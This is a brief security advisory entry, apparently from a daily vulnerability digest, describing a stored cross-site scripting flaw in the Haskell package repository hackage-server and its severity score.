CVE-2026-40472

Daily digests

Hackage-server (the package repository for Haskell) renders user-supplied metadata from .cabal files straight into HTML links without sanitizing it. A malicious package maintainer can inject stored XSS that fires whenever someone views the package page, potentially stealing session cookies or performing actions as the victim. CVSS 9.9, not yet exploited in the wild.

• Daily Digest · Apr 24, 2026

  Entra ID SSRF scores perfect 10, Bing RCE too